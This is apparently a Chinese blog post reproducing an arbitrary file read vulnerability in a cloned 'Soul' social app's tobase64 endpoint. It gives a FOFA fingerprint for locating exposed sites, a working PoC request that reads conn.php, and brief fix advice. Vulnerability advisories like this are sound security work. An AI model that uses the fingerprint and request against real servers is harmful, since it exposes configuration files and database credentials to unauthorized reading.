某仿soul欲音社交系统存在任意文件读取漏洞

于 2024-09-11 20:54:13 发布
阅读量132 收藏 2
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/142149987
版权

1 阅读须知


        技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

2 产品概述

        仿soul欲音社交系统控制器中的tobase64 方法通过传入file参数 然后通过fopen直接读取任意文件,然后输出base64编码后的文件。

3 漏洞描述


        任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取服务器上的任意文件,而不受访问控制限制的漏洞。这种漏洞通常是由于应用程序对用户输入的验证不足、权限配置不当或代码实现缺陷所导致的。 

fofa

"/public/style/admin/js/jquery.min.js"

4.漏洞复现 

 poc

GET /api/upload/tobase64?file=conn.php HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36

 

5 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

 

 

天官赐福万无禁忌
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
分享国外安全团队及工具
专注企业信息安全-sec
03-19 1万+
名称 版 描述 主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....
仿soul交友盲盒系统源码/全开源
03-21
【仿soul交友盲盒系统源码/全开源】是一个基于软件/插件开发的项目,主要用于构建一种类似于Soul App的在线交友平台。该系统的核心功能是通过“盲盒”概念来匹配用户,增加交友的神秘感和趣味性。在获取并部署这套...
仿soul欲音社交系统存在任意文件读取漏洞
weixin_43167326的博客
09-03 653
仿soul欲音社交系统控制器中的tobase64 方法通过传入file参数 然后通过fopen直接读取任意文件,然后输出base64编码后的文件
SRC知识分享【干货满满】
小司机的奥拓
04-23 4734
SRC(SecurityResponseCenter)安全应急响应中心,是企业用于对外接收来自用户/白帽发现并报告相关安全产品安全缺陷的站点,换句话说就是连接白帽子和企业的平台。同时也可以看成一个”资源置换平台“,白帽用自己的技术合法的向企业提交漏洞,企业给予相应的赏金。相对于企业组织内部技术人员进行渗透测试,SRC更像是发起一场“人民的战争”。目前国内有两种漏洞平台,一种是缺陷报告平台,另一种就是xSRC平台。缺陷报告平台:又称漏洞报告平台,是指由独立的第三方公司或机构成立综合性的“安全应急响应中心”。国
qcon_从QCon伦敦2011中学到的主要知识点和教训
cunfu6353的博客
07-14 3742
qcon 在本文中,我们介绍了一些博客和推特上有关QCon London 2011的与会者所看到的要点。 这次QCon,在伦敦举行的第 5 届,在世界第 14 届 ,已在会议召开前几周售罄,共有850多位与会者包括100多位演讲者! QCon伦敦会议由InfoQ.com和Trifork共同制作,该公司在丹麦举办了GOTO会议。 QCon将继续在每年的3月在伦敦运行, QCon SF将在今年11月...
go技术文章梳理(2018)
热门推荐
NicolasLearner的博客
03-02 8万+
gocn_news_2018-12-31 1. Go 入门简介:http://t.cn/EbjzeSt 2. Go GraphQL 新手指南: https://tutorialedge.net/golang/go-graphql-beginners-tutorial/ 3. 你需要 Go web 框架吗:https://medium.com/@tusharsoni/do-you-need-a-web-framework-for-go-51171bb0ea8c 4. OpenEdge:开放的边缘计算平
仿soul交友盲盒系统全开源源码
05-22
仿soul交友盲盒系统全开源源码 本系统是独立源码 前端由VUE开发 后端PHP 没有编译过的纯源码 后端需要 vue 和 node.js 环境才能搭建 本源码需要 微信公众号 微信商户号 要不然使用不了 主要功能 抽对象 存信息 邀请...
2022最新版仿soul交友盲盒系统源码/全开源
04-18
"2022最新版仿soul交友盲盒系统源码/全开源" 这个标题指的是一个基于2022年的最新技术实现的、模仿"Soul"应用的交友平台的源代码。这个系统的核心功能是"盲盒交友",即用户通过类似开盲盒的方式进行随机匹配,增加...
某站价值3000的仿SOUL社交友附近人婚恋约仿陌陌APP源码系统
09-10
动态圈界面完全改版,类似SOUL,包括关注的用户动态,平台推荐动态,全员动态, 可评论留言点赞,发布此动态的用户会得到有相关评论消息的通知 相册的权限设置,可以设置是否收费,是否阅后即焚,是否需要验证才能...
仿soul交友脱单盲盒源码程序带图文搭建教程
07-09
提供仿soul交友盲盒系统源码/全开源版,内置微信免签接口以及个人码支付接口,API部分开源,有能力的可以自己去二次开发。 运行环境 PHP+MYSQL 风格截图 搭建说明 详见压缩包内! 资源下载 下载权限终身VIP专享...
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 721
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1699
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 503
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
Java安全-动态加载字节码
柠檬i的博客
09-07 1111
众所周知,不同平台、不通CPU的计算机指令有差异,但因为Java是一门跨平台的编译型语言,所以这些差异对于上层开发者来说是透明的,上层开发者只需要将自己的代码编译一次,即可运行在不同平台的JVM虚拟机中。
【看雪-注册安全分析报告】
09-05 1478
看雪学苑(www.kanxue.com)是一个专注于PC、移动、智能设备安全研究及逆向工程的安全综合服务网站!创建于2000年,历经20多年的发展,看雪网站形成了大量有价值的技术资料,经过看雪团队的共同努力,先后出版过数本技术专著,深受出版社和广大读者好评,社会影响深远,在行业中树立了令人尊敬的专业形象。平台为会员提供安全知识的在线课程教学,同时为企业提供智能设备安全相关产品和服务。
【精选】文件摆渡系统:跨网文件传输的安全与效率之选
文件数据安全交换
09-06 1203
同时满足安全与效率兼顾的文件摆渡系统,那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》,这是一款由飞驰云联自主研发的安全产品,可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求,通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等,实现统一的文件摆渡安全管控,提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能,可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。
网络通信安全:全面探索与深入分析
最新发布
大厂全栈码农
09-10 1161
在不断发展的信息技术环境下,我们需要持续关注网络通信安全领域的新变化和新挑战,不断完善防护机制,加强安全管理,提高全社会的网络通信安全意识,以保障个人、企业和国家的网络安全利益。例如,攻击者可以通过伪装成合法的机构或人员,如银行客服、IT 技术支持等,通过电话、电子邮件或短信等方式骗取用户的信任,从而获取用户的敏感信息,如账号、密码、验证码等。例如,用户在登录网上银行时,需要输入用户名、密码以及动态口令,并且银行服务器与浏览器之间的通信通过 SSL/TLS 加密,确保用户的账户信息和交易信息安全
将AI与情境定位结合以确保品牌安全
微信,抖音等国内主要流量平台打通,企业可以无缝把现有的业务场景接入AI能力
09-04 1540
互动广告局 (IAB) 将品牌安全描述为确保你的广告不会出现在不适当、有害或有争议的内容旁边。这些内容可能会损害品牌形象,并可能削弱目标市场的信任度。品牌适配性更进一步。它不仅确保广告避开有害内容,还确保广告与品牌的身份和价值观一致。此举在于寻找广告的“合适”位置,而不仅仅是“安全”的位置。例如,确保奢侈品牌仅出现在高端生活方式内容旁边。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值